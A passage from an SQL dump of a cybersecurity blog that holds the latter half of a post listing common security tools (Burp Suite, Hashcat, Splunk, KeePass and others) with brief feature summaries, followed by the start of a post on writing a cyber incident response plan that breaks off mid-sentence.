<b><strong class=\"font-bold\">Burp Suite</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A must-have platform for web application security testing.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Detects vulnerabilities like SQL injection and XSS.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Intercepts and modifies HTTP requests/responses.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Scans web apps for known vulnerabilities.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. 
<b><strong class=\"font-bold\">Nessus</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A commercial vulnerability scanner trusted by security teams worldwide.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Performs system and network vulnerability scans.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Assesses compliance with security standards.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Prioritizes threat risks for mitigation.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. 
<b><strong class=\"font-bold\">Aircrack-ng</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A specialized suite for wireless network penetration testing.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Detects and maps wireless networks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Cracks WEP and WPA/WPA2 passwords.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Monitors wireless traffic for suspicious activities.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">8. 
<b><strong class=\"font-bold\">John the Ripper</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A fast and flexible password-cracking tool.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Cracks passwords using techniques like dictionary and brute-force attacks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Recovers forgotten passwords.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Audits password strength.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">9. 
<b><strong class=\"font-bold\">Hashcat</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Known for its speed and GPU acceleration, this tool is ideal for password cracking.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Cracks MD5, SHA-1, NTLM, and more.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Recovers lost or forgotten passwords.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Audits the strength of password hashes.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">10. 
<b><strong class=\"font-bold\">TheHarvester</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">An intelligence-gathering tool tailored for reconnaissance activities.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Gathers employee emails, subdomains, and organization details.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Supports social engineering and penetration testing.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Collects email addresses (only for authorized purposes).</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">11. 
<b><strong class=\"font-bold\">OWASP ZAP (Zed Attack Proxy)</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">An open-source security scanner for web applications.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Performs manual and automated web security testing.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Intercepts and edits HTTP requests and responses.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Conducts both active and passive scans of apps.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">12. 
<b><strong class=\"font-bold\">Splunk</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A leading platform for SIEM (Security Information and Event Management).</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Collects and analyzes security logs from IDS, firewalls, and servers.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Detects and mitigates threats in real-time.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Investigates incidents and ensures compliance reporting.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">13. 
<b><strong class=\"font-bold\">Elasticsearch</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A scalable open-source search engine ideal for threat hunting and log management.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Aggregates and analyzes logs from applications, devices, and servers.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Allows threat investigation through vast data searches.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Improves real-time threat detection with deep data analysis.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">14. 
<b><strong class=\"font-bold\">Sysinternals Suite</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A set of tools for troubleshooting and analyzing Windows systems.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Diagnoses system issues.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Monitors and controls system processes.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Analyzes file system activity to detect risks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Audits the security posture of Windows environments.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">15. 
<b><strong class=\"font-bold\">KeePass</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">An open-source password manager designed for secure password management.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Securely stores and organizes passwords.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Generates strong, random passwords.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Offers auto-type functionality for web forms.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Shares passwords securely when needed.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">\r\nHow to Use These Tools Effectively</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Integrating cybersecurity tools into your daily practices can seem overwhelming at first, but a few steps can simplify the process. Start by identifying your <b><strong class=\"font-bold\">most vulnerable areas</strong></b>—this could be network security, data encryption, or employee password management. 
Then, implement tools designed to target those weaknesses.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For example:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Small businesses</strong></b> can use tools like KeePass for password management and Nessus for vulnerability scanning.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">IT teams</strong></b> can adopt Splunk for real-time threat monitoring and Metasploit for penetration testing.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Individuals</strong></b> can safeguard personal data with tools like Wireshark (for network security) and John the Ripper (to ensure password strength).</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">\r\nThe Future of Cybersecurity Tools</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The cybersecurity industry is rapidly evolving to combat creative and adaptive cyber threats. 
Here\'s what to watch for in upcoming tools:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">AI-Driven Solutions</strong></b>: Predictive capabilities built into tools like Splunk enable early detection of threats.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Zero-Trust Policies</strong></b>: Encourage tools such as Forcepoint and other endpoint security measures to limit access before verifying trust.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">More Open-Source Collaborations</strong></b>: Platforms like Kali Linux and Elasticsearch have demonstrated that open-source tools are vital for the cybersecurity community.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Businesses adopting cutting-edge tools will be in a much better position to keep ahead of cybercriminals, ensuring secure systems and improved digital trust.\r\n\r\n</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Whether you’re a seasoned IT professional, a small business owner, or just looking to enhance your personal cybersecurity, these tools empower you to tackle today’s toughest challenges. From password management to penetration testing and everything in between, selecting the right tools is crucial.</p>', '', NULL, NULL, 1, 'draft', '2025-01-19 16:49:15', '2026-01-12 21:41:44', 'Tools', '15 Best Cybersecurity Tools You Need to Know in 2025', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(69, 'How to Create a Cyber Incident Response Plan', 'how-to-create-a-cyber-incident-response-plan', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybercrime is on the rise, impacting organizations of all sizes. With cyber threats becoming increasingly sophisticated, adopting a robust Cyber Incident Response Plan (CIRP) is no longer optional—it\'s essential. Whether you’re an IT professional, a cybersecurity analyst, or a small business owner, having a CIRP in place ensures that your organization is equipped to handle incidents efficiently while minimizing damage.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This guide will walk you through everything you need to know about CIRPs—from their importance to how you can create one tailored to your specific needs.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. What is a Cyber Incident Response Plan (CIRP)?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A Cyber Incident Response Plan is a structured approach to managing and responding to cybersecurity incidents, such as ransomware attacks, phishing attempts, or data breaches. It outlines the roles, responsibilities, and processes an organization must follow to quickly identify, mitigate, and recover from these threats.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">CIRPs are vital not only for large corporations but also for small businesses and individuals who are increasingly becoming targets for hackers. A well-crafted CIRP safeguards critical assets and ensures business continuity during a crisis.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. 
Why Having a CIRP is Crucial</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cyber attacks don’t just result in financial losses; they can damage your reputation, erode customer trust, and even result in legal or regulatory consequences. For small businesses, this can be especially crippling—60% of small businesses close within six months following a cyber attack.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A CIRP is your first line of defense. Here’s why it matters:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Minimized Damage</strong></b>: Quick responses help limit the financial and operational impact of an attack.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Improved Team Preparedness</strong></b>: With clearly defined roles and procedures, your team can respond to incidents with confidence.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Regulatory Compliance</strong></b>: Many industries now require businesses to have formal incident response procedures.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Safeguarded Reputation</strong></b>: Proper handling of cyber incidents keeps customer trust intact.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] 
[&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Key Elements of a Comprehensive CIRP</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">An effective CIRP integrates several critical elements. Here’s what to include:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Identifying and Categorizing Incidents</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Not all cyber incidents are the same. Some might involve malware or account compromise, while others may target sensitive data or customer records. Identify potential incident types relevant to your organization and develop a framework for categorizing them by severity and urgency.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Defining Roles and Responsibilities</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Assign clear responsibilities to team members. 
For instance:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Incident Response Lead</strong></b> coordinates the response activities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">IT Personnel</strong></b> mitigates technical issues.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Legal and Compliance Teams</strong></b> ensure regulatory adherence.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">PR and Communications Teams</strong></b> manage the narrative externally.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This clarity avoids confusion during high-stress situations.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Establishing Communication Strategies</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Effective communication is crucial during an incident. 
Use pre-defined escalation protocols to inform relevant internal stakeholders and, when necessary, external entities such as customers, the media, or regulatory bodies. Keep up-to-date contact lists and an out-of-band channel (such as phone or a separate messaging service) ready, since the attacker may be reading your email or chat, and build regulatory notification deadlines into the protocol.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Incident Containment and Eradication</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Contain the threat and preserve evidence before eradicating it:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Isolate affected systems from the network to prevent further damage—prefer network isolation over powering them off, so that volatile evidence such as memory can still be captured—and take disk and memory images while the system is in that state.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Only after evidence has been captured, apply patches to the exploited vulnerabilities, remove the malicious elements, 